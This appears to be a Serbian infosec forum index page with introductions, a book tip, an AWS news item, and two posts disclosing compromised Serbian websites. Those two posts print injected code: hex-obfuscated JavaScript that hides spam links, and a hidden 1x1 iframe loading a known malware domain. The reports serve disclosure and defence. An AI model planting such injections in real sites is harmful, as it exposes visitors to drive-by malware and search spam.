Welcome, Guest |
You have to register before you can post on our site.
|
|
|
Sakrivene reklame na contractor.rs |
Posted by: 1van - 09-28-2022, 06:56 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detektovano u još u martu, server Loopia: https://twitter.com/ivanmarkovicsec/stat...4906699776.
Code: <div name="LcOkne" id="FQfMnG">
<a href="http://www.atleticoarezzo.it/">UGG Saldi</a>
<a href="http://www.associazionespazzavento.it/">Stivali UGG</a>
<a href="http://www.agendacultura.it/">UGG Saldi</a>
<a href="http://www.rumeniinitalia.it/">UGG Outlet</a>
<a href="http://www.anspilecce.it">Stivali UGG</a>
<a href="http://www.montanolucino-ut.it">UGG Outlet</a>
<a href="http://www.mtdirectionsk.it">Stivali UGG</a>
<a href="http://www.bkvietnam.dk/">UGG Sko</a>
<a href="http://www.altieco.dk/">UGG Australia</a>
<a href="http://www.vinboden.dk">Billige UGG</a>
<a href="/teletext/ralph-lauren-vaska.html" title="ralph lauren väska">ralph lauren väska</a>
<a href="/teletext/ralph-lauren-skjorta.html" title="ralph lauren skjorta">ralph lauren skjorta</a>
<a href="/teletext/ralph-lauren-jacka-herr.html" title="ralph lauren jacka herr">ralph lauren jacka herr</a>
<a href="/teletext/ralph-lauren-parfym-dam.html" title="ralph lauren parfym dam">ralph lauren parfym dam</a>
<a href="/teletext/polo-ralph-lauren-skor.html" title="polo ralph lauren skor">polo ralph lauren skor</a>
<a href="/teletext/ralph-lauren-skjorta-dam.html" title="ralph lauren skjorta dam">ralph lauren skjorta dam</a>
</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>
</body>
Code: De-obfuscated code: var _0x6977 = ["getElementById", "style", "FQfMnG", "display", “none"];
Whois:
Quote:Registrant: Contractor D.O.O.
Address: Brdjanska 458, Ripanj, Beograd, Srbija
Registration number: 07487436
Tax ID (PIB): 101745588
Administrative contact: Ilmak D.O.O.
Address: Cincar Jankova 7, Beograd, Srbija
Technical contact: Loopia d.o.o.
Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Srbija
Registration number: 17503626
|
|
|
Zaboravljeni malware link na df.rs |
Posted by: 1van - 09-28-2022, 06:47 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detektovano još u Martu, server je Loopia: https://twitter.com/ivanmarkovicsec/stat...6026613761. Ako ovo nisu videli ko zna šta još ima tamo.
Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sajt u izradi</title>
</head>
<frameset rows="*">
<frame src="http://www.loopia.co.yu/under_construction/" />
</frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>
Domen alcobro.net se spominje na više mesta ali npr. i ovde: https://github.com/stamparm/maltrail/blo...istory.txt.
Whois:
Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626
|
|
|
cao svima |
Posted by: Aleksandar.Dj. - 09-28-2022, 09:44 AM - Forum: O Vama
- Replies (3)
|
|
Zdravo, na forum sam naisao putem Ivanovog posta na linkedin-u u vezi inficiranja mreze katastra ransomware-om.
Dugo sam u ITju ali sam za sigurnost krenuo tek skoro da se interesujem. Nedostaje mi vec duze neki dobar forum kao sto je bio stari elitesecurity npr.
Nadam se pametnim raspravama i pozdravljam sve.
|
|
|
Pozdrav |
Posted by: pakonja - 09-27-2022, 09:00 PM - Forum: O Vama
- Replies (2)
|
|
Ivan je "krivac" sto sam ovde, forum je interesantne tematike pa verujem da ce biti dosta zanimljivih sadrzaja...
Inace, zovem se Sasa, u IT-u sam profesionalno oko 13 godina (mreze, serveri, klijentska podrska....). Amiga 500 mi je bila prva ljubav, posle sam presao na PC - Intel Pentium 133MHz sa 14400 modemom! E taj modem je krivac za sve... tada sam poceo da se kacim na BBS-ove (posebno mi se svideo 013 Electro iz Bele Crkve), posle BBS-ova se pojavilo nesto sto se zvalo dial up internet, tada sam saznao za neke cudne skracenice IRC, ICQ, MSN, e-mail, web... i eto... malo po malo - stiglo se do 13 godina u IT-u
Ah da, preskocio sam period studiranja i konektovanja racunara na GPRS internet preko Siemens ME45 mobilnog telefona jer tada u studentskom domu nije postojao internet a IRC ovisnost je bila jaca od svega i jednostavno sam MORAO i tamo da imam neki internet. Ne znam mozete li zamisliti moju srecu kada sam posle brdo neprespavanih noci, citanja raznorazne dokumentacije i posle kucanja gomile AT komandi uspeo da se konektujem na GPRS i uspostavim konekciju ka IRC serveru sa racunara... Bila su to neka lepa vremena, puna istrazivanja, ucenja, informacije nisu bile na dohvat ruke kao sada i za svaku informaciju si morao bas da se pomucis da je nadjes kako bi naucio nesto novo... uhh kakav flashback...!
Tol'ko od mene za sada...
|
|
|
Surveillance Valley |
Posted by: y0d4 - 09-27-2022, 04:22 PM - Forum: Vesti, zanimljivosti i razno
- No Replies
|
|
Posto je cela prica ovde oko bezbednosti, imam jednu toplu i veliku preporuku za knjigu Surveillance Valley
Kjigu je pisao rusko/americki (rodjen u RU, zivi u US - barem poslednji info koji sam dokacio) novinar, zasnovanu najvise na FOIA zahtevima (po meni nema verodostojniji izvor).
Knjiga se radi o nastanku interneta, kako je ideja rodjena u Vijetnamskom ratu, pa se pretvorio u ovo sto je danas internet.
Takodje se spominje tor, signal, open source community, crypto ... generalno dosta tema koje se ticu ovog foruma
Nakon citanja ovako necega, gledacete na internet i dogadjaje na istom iz potpuno drugacije perspektive...
I da ne davim mnogo, velika preporuka za sve koga zanima istorija interneta....
|
|
|
AWS Outposts in Serbia |
Posted by: 1van - 09-27-2022, 04:16 PM - Forum: Web, Cloud and Mobile bezbednost
- Replies (12)
|
|
Quote:AWS Outposts rack can now be shipped and installed at your data center and on-premises locations in Kazakhstan and Serbia.
AWS Outposts rack, a part of the AWS Outposts family, is a fully managed service that extends AWS infrastructure, AWS services, APIs, and tools to virtually any data center or co-location space for a truly consistent hybrid experience. Outposts rack is ideal for workloads that require low latency access to on-premises systems, local data processing, and migration of applications with local system interdependencies. Outposts rack can also help meet data residency requirements.
With the availability of Outposts rack in Kazakhstan and Serbia you can use AWS services to run your workloads and data in country in your on-premises facilities and connect to your nearest AWS Region for management and operations.
To learn more about Outposts rack, read the product overview and user guide. For the most updated list of AWS Regions where Outposts rack is supported, check out the Outposts rack FAQs page.
Link: https://aws.amazon.com/about-aws/whats-n...an-serbia/
Da li neko zna gde je hostovano, koji data centar? I ko je odgovoran za bezbednost, na svim nivoima?
|
|
|
~~Sportski pozdrav!~~ |
Posted by: Ched - 09-27-2022, 03:22 PM - Forum: O Vama
- Replies (3)
|
|
Velik pozdrav svima,
Moje ime je Čedomir zovite me Ched, završio kriminalističko policijsku akademija sad (univerzitet) sektor za IT i informacionu bezbednost,
Moj bio je da od malena sam voleo da učim o IT-u iz aspekta Gray-hat-a, velik sam forum junkie i uvek sam bio okružen interesantnim kolegama iz te svere Black Hat-a, napomenuo sam gray-hat jer nisam učestvovao ali sam uvek bio obavešten u sitnim detaljima tih dešavanja (Insider)
Lets get to the hot stuff, da... policijska akademija, Woohoo! samo ću reći da je disciplinksi fakultet prvenstveno, ali uvek su fleksibilni za ideje Bezbednosti koje mogu po njihovom postupku, (odnosno potpisom), upoznao CERT prikazao im WifiDucky kao neki wow faktor mog sveta iz Hack5
U slučaju da vas zanima nešto više o policiji, feel free da cimnete na >192, siguran sam da će odgovoriti nekad...
|
|
|
pozdrav svima |
Posted by: milos_rs - 09-27-2022, 09:30 AM - Forum: O Vama
- Replies (2)
|
|
Ćao svima, Ja sam Miloš očigledno, u avgustu 2016 sam otvorio profil na twitteru da na jednom mestu bude sažeto sve vezano za pretežno lokalni infosec preko retvitova drugih a i sopstvenih istraživanja, tada nije postojao sličan profil, barem ne da je aktivan. Inače uglavnom ne istražujem aktivno nego samo nešto na šta slučajno naletim. Ideja je bila da napravim ceo sajt/blog ali mi je na kraju kratka forma twittera više prijala i manje vremena oduzima.
Na internetu sam otprilike od 1991/92. godine ne sećam se više precizno, bio je tada neki lik koji je radio u pošti u Banja Luci i imao je linux mašinu sa call-back softverom, sećam se pozovem modemom iz Beograda tu mašinu, ulogujem se i otkucam komandu da me pozove nazad i prekinem vezu, onda mašina mene zove i impulsi idu njemu, tj. idu nigde jer je radio u PTTu Ta mašina je drugim linkom bila povezana sa javnim internetom preko ne znam čega i voila! Bio sam online i tu se najviše haralo po IRC-u i Gopher-om istraživao tadašnji internet, povezivalo se na .mil računare i hakovalo pre nego što je to bilo kul. Kad je ta veza sa internetom ubrzo pukla jer je zbog rata oprema uništena imao sam pristup JUPAK-u i onome što je preko njega bilo dostupno. Naravno i nezavisni lokalni BBS su tada bili aktuelni, kao i SEZAM bez PRO. Zvao sam i neki hakerski BBS u nemačkoj i skidao razne alate, kad je stigao račun za telefon više nisam Onda se posle prešlo na Dial-up i ostalo je istorija...
Profesionalno sam jack-of-all-trades već više od 20 godina, najviše sam bio u sysadminskim ulogama sa solidnom dozom mreža i sigurnosti. Linuxaš sam u duši ali silom prilika mi je kroz karijeru Windows dominirao kao nužno zlo. Uvek sam bio nekako infosec orijentisan, te između ostalih uloga radim i na tome dosta u firmi kao blue team, ali nikad nisam bio u isključivo infosec ulozi, mada ciljam ka tome ili ka devops/devsecops.
to bi bilo to za sada
|
|
|
|